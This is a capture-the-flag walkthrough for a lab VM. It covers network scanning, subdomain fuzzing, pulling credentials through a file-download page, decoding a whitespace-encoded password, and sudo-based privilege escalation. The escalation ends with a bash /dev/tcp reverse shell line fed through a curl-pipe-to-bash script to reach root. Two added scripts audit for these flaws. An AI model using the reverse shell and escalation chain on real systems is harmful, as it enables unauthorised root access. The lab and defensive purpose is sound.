1. Information gathering
Start with a scan.
Administrator on ~/Desktop
# ipconfig
Windows IP 配置
未知适配器 OpenVPN Wintun:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::e7f5:3c67:3a01:9c17%5
IPv4 地址 . . . . . . . . . . . . : 192.168.56.104
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
未知适配器 OpenVPN TAP-Windows6:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 蓝牙网络连接:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
Administrator on ~/Desktop
# nmap -sP 192.168.56.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:46 中国标准时间
Nmap scan report for 192.168.56.1
Host is up (0.0056s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0020s latency).
MAC Address: 08:00:27:BF:4C:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.0010s latency).
MAC Address: 08:00:27:74:9B:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.0010s latency).
MAC Address: 00:0C:29:EB:98:6D (VMware)
Nmap scan report for 192.168.56.104
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.41 seconds
The scan shows the target is 192.168.56.105.
Port scan:
Administrator on ~/Desktop
# nmap -A -p- 192.168.56.105
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:50 中国标准时间
Nmap scan report for 192.168.56.105
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5f:cd:98:ac:0e:76:be:d0:9c:ae:23:47:8d:03:b5:07 (RSA)
| 256 f5:cb:de:f0:89:dc:ff:56:89:44:05:3c:a3:44:8f:70 (ECDSA)
|_ 256 3a:94:cc:9e:aa:ab:7d:64:71:26:49:48:02:07:62:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:EB:98:6D (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.15 ms 192.168.56.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.49 seconds
The scan finds 22/ssh and 80/http, and the OS is Ubuntu.
The page on port 80 is empty, but it reveals a site domain name.
Add an entry to the hosts file:
192.168.56.105 bassam.ctf
Flush the DNS cache in cmd:
ipconfig /flushdns
The page is now reachable.
Fuzz subdomains and find welcome.bassam.ctf (gobuster's vhost mode did not work well here; the same wordlist found nothing).
Administrator on ~/Desktop
# ffuf -c -u http://bassam.ctf/ -w D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt -H "Host: FUZZ.bassam.ctf" -fs 21
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://bassam.ctf/
:: Wordlist : FUZZ: D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt
:: Header : Host: FUZZ.bassam.ctf
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 21
________________________________________________
[Status: 200, Size: 38, Words: 4, Lines: 4, Duration: 13ms]
* FUZZ: welcome
:: Progress: [114441/114441] :: Job [1/1] :: 293 req/sec :: Duration: [0:05:06] :: Errors: 0 :::
The hint there is not useful; enumerate directories:
Administrator on ~/Desktop
# gobuster dir -u http://welcome.bassam.ctf -w D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt -x .zip,.php,.txt,.html.php.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://welcome.bassam.ctf
[+] Method: GET
[+] Threads: 10
[+] Wordlist: D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: zip,php,txt,html.php.bak
[+] Timeout: 10s
===============================================================
2023/12/08 11:44:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 283]
/.html.php.bak (Status: 403) [Size: 283]
/index.php (Status: 200) [Size: 229]
/config.php (Status: 200) [Size: 0]
/.php (Status: 403) [Size: 283]
/.html.php.bak (Status: 403) [Size: 283]
Progress: 437506 / 438325 (99.81%)
===============================================================
2023/12/08 11:46:03 Finished
===============================================================
Two hits: index.php and config.php. Visiting them shows that config.php returns an empty page when opened directly, while index.php is a file-download page.
Entering config.php as the file to download works; inspect the downloaded file.
2. Getting into the system
The file contains a username and password. SSH was found open earlier, so try logging in with them.
Last login: Sun Dec 13 10:38:10 2020 from 192.168.162.128
$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ uname -a
Linux kira 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ ls
$ pwd
/home/test
$ pwd
/home/test
$ ls
$ cd ..
$ ls
bassam kira test
$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Dec 13 2020 .
drwxr-xr-x 25 root root 4096 Dec 13 2020 ..
drwxr-xr-x 2 bassam bassam 4096 Dec 13 2020 bassam
drwxr-xr-x 5 kira kira 4096 Dec 13 2020 kira
drwxr-xr-x 4 test test 4096 Dec 13 2020 test
$ cd bassam
$ ls
down.sh
$ cat down.sh
curl "http://mywebsite.test/script.sh" |bash
$ cd ..
$ cd kira
$ ls
test.sh
$ cat test.sh
echo 'your name'
read name
echo $name >/home/kali/message.txt
$1 2>/dev/null
Check sudo rights, then go up to the root directory, where there is a PassProgram folder.
$ sudo -l
[sudo] password for test:
Sorry, user test may not run sudo on kira.
$ cd PassProgram
$ pwd
/PassProgram
$ ls
decoder encoder
$ pwd
/PassProgram
$ cd ..
$ pwd
/
The test user cannot run sudo on kira.
Go back to the test home directory and list the files; there is a hidden .bash_history file, so read it.
$ cd test
$ ls -la
total 36
drwxr-xr-x 4 test test 4096 Dec 8 05:46 .
drwxr-xr-x 5 root root 4096 Dec 13 2020 ..
-rw------- 1 test test 34 Dec 13 2020 .bash_history
-rw-r--r-- 1 test test 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 test test 3771 Apr 4 2018 .bashrc
drwx------ 2 test test 4096 Dec 13 2020 .cache
drwx------ 3 test test 4096 Dec 13 2020 .gnupg
-rw-r--r-- 1 test test 807 Apr 4 2018 .profile
-rw------- 1 test test 722 Dec 8 05:46 .viminfo
$ cat .bash_history
ls
cat MySecretPassword
clear
ls
$
It shows that a file named MySecretPassword was viewed at some point; search for it:
$ find / -type f -name "MySecretPassword"
find: ‘/run/lxcfs’: Permission denied
find: ‘/run/sudo’: Permission denied
find: ‘/run/cryptsetup’: Permission denied
find: ‘/run/lvm’: Permission denied
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
find: ‘/root’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/home/kira/.cache’: Permission denied
find: ‘/home/kira/.gnupg’: Permission denied
find: ‘/home/kira/.local/share’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
find: ‘/sys/fs/pstore’: Permission denied
find: ‘/sys/fs/fuse/connections/49’: Permission denied
find: ‘/lost+found’: Permission denied
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atspool’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
/var/www/ctf/MySecretPassword
Go there and take a look.
$ cat MySecretPassword
$ file MySecretPassword
MySecretPassword: ASCII text
$ hexdump MySecretPassword
0000000 2020 2020 2020 2020 2020 2020 2020 2020
*
0000060 2020 2020 2020 2020 2020 0a20 2020 2020
0000070 2020 2020 2020 2020 2020 2020 2020 2020
*
00000d0 2020 2020 0a20 2020 2020 2020 2020 2020
00000e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000140 2020 2020 2020 2020 200a 2020 2020 2020
0000150 2020 2020 2020 2020 2020 2020 2020 2020
*
00001a0 2020 2020 2020 2020 2020 200a 2020 2020
00001b0 2020 2020 2020 2020 2020 2020 2020 2020
*
00001d0 2020 2020 2020 2020 2020 2020 0a20 2020
00001e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000200 2020 2020 2020 2020 2020 2020 2020 200a
0000210 2020 2020 2020 2020 2020 2020 2020 2020
*
0000230 2020 2020 2020 2020 2020 2020 2020 0a20
0000240 2020 2020 2020 2020 2020 2020 2020 2020
*
0000270 2020 0a20
0000274
cat shows nothing, but hexdump shows the bytes follow a regular pattern, so the content is probably encoded. PassProgram, found earlier, contains decoder and encoder, so this is probably the encoded file.
$ ls -la
total 48
drwxr-xr-x 2 root root 4096 Dec 13 2020 .
drwxr-xr-x 25 root root 4096 Dec 13 2020 ..
-rwxr-xr-x 1 root root 16864 Dec 13 2020 decoder
-rwxr-xr-x 1 root root 16816 Dec 13 2020 encoder
$ ./decoder
Usage ./decoder <file to decode>
$ ./decoder /var/www/ctf/MySecretPassword
[*] Variables ready to go!
[*] File handled successfully!
[~] WORD: kira2003
[!] DONE
The WORD is kira2003, probably kira's password.
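The hexdump above already explains why cat showed nothing and why the decoder could recover a word: every byte is a space (0x20) except eight newlines (0x0a), and the length of each run of spaces is the ASCII code of one character. The block below is an added example, not the CTF's decoder binary; it rebuilds the file from the newline offsets printed in the hexdump, checks that inference, and includes the kind of scan a defender would run to find files that look empty but are not. NEWLINE_OFFSETS and TOTAL_SIZE are read from the page's hexdump; the directory layout in demo_scan is constructed.

```python
"""Analyse a file that `cat` renders as blank (added example, not the CTF's decoder)."""
from __future__ import annotations
import os
import tempfile

# Newline offsets read off the page's hexdump. hexdump prints little-endian
# 16-bit words, so a word "0a20" is the byte 0x20 followed by 0x0a.
NEWLINE_OFFSETS = [0x6B, 0xD5, 0x148, 0x1AA, 0x1DD, 0x20E, 0x23F, 0x273]
TOTAL_SIZE = 0x274  # final offset printed by hexdump


def build_sample() -> bytes:
    """Reconstruct MySecretPassword: all spaces, with newlines at the dumped offsets."""
    buf = bytearray(b" " * TOTAL_SIZE)
    for off in NEWLINE_OFFSETS:
        buf[off] = 0x0A
    return bytes(buf)


def is_blank_looking(data: bytes) -> bool:
    """Non-empty, but made only of bytes a terminal shows as whitespace."""
    return bool(data) and not data.strip(b" \t\r\n\x0b\x0c")


def run_lengths(data: bytes) -> list[int]:
    """Length of every newline-terminated run (a trailing run without newline counts too)."""
    lines = data.split(b"\n")
    if lines and lines[-1] == b"":
        lines.pop()
    return [len(line) for line in lines]


def decode_run_lengths(data: bytes) -> str:
    """Interpret each run length as one printable ASCII code."""
    lengths = run_lengths(data)
    if not all(32 <= n < 127 for n in lengths):
        raise ValueError("run lengths are not printable ASCII codes")
    return "".join(chr(n) for n in lengths)


def encode_run_lengths(text: str) -> bytes:
    """Inverse of decode_run_lengths, used to confirm the inference round-trips."""
    return b"".join(b" " * ord(c) + b"\n" for c in text)


def find_blank_looking_files(root: str, min_size: int = 16) -> list[str]:
    """Defender's check: list files of at least min_size bytes that cat would show as empty."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # first MiB is enough to classify
            except OSError:
                continue
            if len(data) >= min_size and is_blank_looking(data):
                hits.append(path)
    return sorted(hits)


def demo_scan() -> list[str]:
    """Constructed directory: one whitespace-only file beside a normal one; returns the flagged names."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "MySecretPassword"), "wb") as fh:
            fh.write(build_sample())
        with open(os.path.join(root, "index.html"), "wb") as fh:
            fh.write(b"<html></html>\n")
        return [os.path.basename(p) for p in find_blank_looking_files(root)]


if __name__ == "__main__":
    sample = build_sample()
    print(len(sample), run_lengths(sample), decode_run_lengths(sample), demo_scan())
```

A file like this passes `file` as "ASCII text" and prints nothing visible, so size on disk rather than visible content is the signal worth alerting on.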
Administrator on ~/Desktop
# ssh kira@192.168.56.105
kira@192.168.56.105's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 8 06:19:16 UTC 2023
System load: 0.0 Processes: 165
Usage of /: 21.3% of 19.56GB Users logged in: 1
Memory usage: 25% IP address for ens33: 192.168.56.105
Swap usage: 0%
258 packages can be updated.
198 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Dec 13 11:57:18 2020
kira@kira:~$
kira@kira:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on kira:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kira may run the following commands on kira:
(bassam) /home/kira/test.sh
kira@kira:~$ ls
test.sh
Privilege escalation:
kira@kira:~$ sudo -u bassam ./test.sh bash
your name
/home/kira/test.sh: 3: /home/kira/test.sh: cannot create /home/kali/message.txt: Directory nonexistent
ls
test.sh
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
Now running as bassam; keep looking for a way to escalate.
cd bassam
ls
down.sh
sudo -l
Matching Defaults entries for bassam on kira:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bassam may run the following commands on kira:
(root) NOPASSWD: /home/bassam/down.sh
sudo -u root ./down.sh bash
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
cat down.sh
curl "http://mywebsite.test/script.sh" |bash
down.sh downloads a file with curl and pipes it straight into bash.
cat hosts
127.0.0.1 localhost
127.0.1.1 kira
192.168.56.105 mywebsite.test
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
/etc/init.d/network restart
3. Privilege escalation to root
Running down.sh with plain sudo asks for bassam's password, but sudo -l shows:
User bassam may run the following commands on kira:
(root) NOPASSWD: /home/bassam/down.sh
sudo /home/bassam/down.sh
does not require a password.
On the attacking machine, start Python's HTTP server and create script.sh containing whoami.
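Both escalation steps on this box come from the same class of misconfiguration: a sudo rule that delegates to a shell script the invoking user can influence (test.sh executes its first argument and lives in kira's own home; down.sh runs curl | bash against a hostname that /etc/hosts resolves). The following is an added audit script, not part of the writeup, that flags exactly those patterns. The sudoers text mirrors the two `sudo -l` rules above, the script bodies are the ones shown on the page, and the file owner and mode values are assumptions made for the example.

```python
"""Audit sudo rules that hand root (or another user) to a shell script (added example)."""
from __future__ import annotations
import re
from urllib.parse import urlparse

# Constructed sudoers lines, equivalent to the two rules `sudo -l` printed on this page.
SUDOERS = """
kira   ALL=(bassam) /home/kira/test.sh
bassam ALL=(root) NOPASSWD: /home/bassam/down.sh
"""

# Constructed file table: path -> (owner, mode, content).
# Contents are the scripts from the page; owner and mode are assumed for the example.
FILES = {
    "/home/kira/test.sh": ("kira", 0o755,
        "echo 'your name'\nread name\necho $name >/home/kali/message.txt\n$1 2>/dev/null\n"),
    "/home/bassam/down.sh": ("bassam", 0o755,
        'curl "http://mywebsite.test/script.sh" |bash\n'),
}

# /etc/hosts as shown on the page.
HOSTS = "127.0.0.1 localhost\n127.0.1.1 kira\n192.168.56.105 mywebsite.test\n"

RULE_RE = re.compile(r"^(\S+)\s+\S+=\((\S+?)\)\s*(NOPASSWD:\s*)?(\S+)")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z|da)?sh\b")
# A positional parameter used as the command itself, at line start or after ; & |
ARG_EXEC_RE = re.compile(r'(?m)(?:^|[;&|])\s*"?\$(?:\{?[1-9@*]\}?)"?(?=\s|$)')
URL_RE = re.compile(r"https?://[^\s\"']+")


def parse_sudoers(text: str) -> list[dict]:
    """Minimal parser for 'user HOST=(runas) [NOPASSWD:] command' lines."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"user": m.group(1), "runas": m.group(2),
                          "nopasswd": bool(m.group(3)), "command": m.group(4)})
    return rules


def hosts_names(hosts_text: str) -> set[str]:
    """Hostnames whose resolution is decided locally by /etc/hosts."""
    names: set[str] = set()
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2:
            names.update(fields[1:])
    return names


def audit(rules: list[dict], files: dict, hosts_text: str) -> list[tuple[str, str, str]]:
    """Return (invoking user, command, finding code) triples."""
    local_names = hosts_names(hosts_text)
    findings = []
    for r in rules:
        user, cmd = r["user"], r["command"]
        if r["nopasswd"] and r["runas"] == "root":
            findings.append((user, cmd, "NOPASSWD_AS_ROOT"))
        entry = files.get(cmd)
        if entry is None:
            continue
        owner, mode, content = entry
        if owner == user:
            findings.append((user, cmd, "OWNED_BY_INVOKER"))   # invoker can rewrite the script
        if mode & 0o022:
            findings.append((user, cmd, "GROUP_OR_WORLD_WRITABLE"))
        if PIPE_TO_SHELL_RE.search(content):
            findings.append((user, cmd, "PIPE_TO_SHELL"))
            for url in URL_RE.findall(content):
                if url.startswith("http://"):
                    findings.append((user, cmd, "PLAINTEXT_FETCH"))
                if urlparse(url).hostname in local_names:
                    findings.append((user, cmd, "HOSTS_CONTROLLED_SOURCE"))
        if ARG_EXEC_RE.search(content):
            findings.append((user, cmd, "EXECUTES_ARGUMENT"))
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SUDOERS), FILES, HOSTS):
        print(f)
```

The fix for each finding is the same in spirit: a sudo target must be root-owned and not writable by the invoker, must not execute its arguments, and must not fetch code at run time from a name that local resolver configuration can redirect.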
./down.sh
bassam
sudo ./dowm.sh
[sudo] password for bassam:
[sudo] password for bassam:
sudo /home/bassam/down.sh
root
Change the content of script.sh to:
sh -i >& /dev/tcp/192.168.56.104/9001 0>&1
Reverse shell.
Start a listener on the attacking machine:
nc -lvvp 9001
On the target, run sudo /home/bassam/down.sh
Administrator on ~/Desktop
# nc -lvvp 9001
listening on [any] 9001 ...
connect to [192.168.56.104] from bassam.ctf [192.168.56.105] 44922: unknown socket error
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
down.sh
#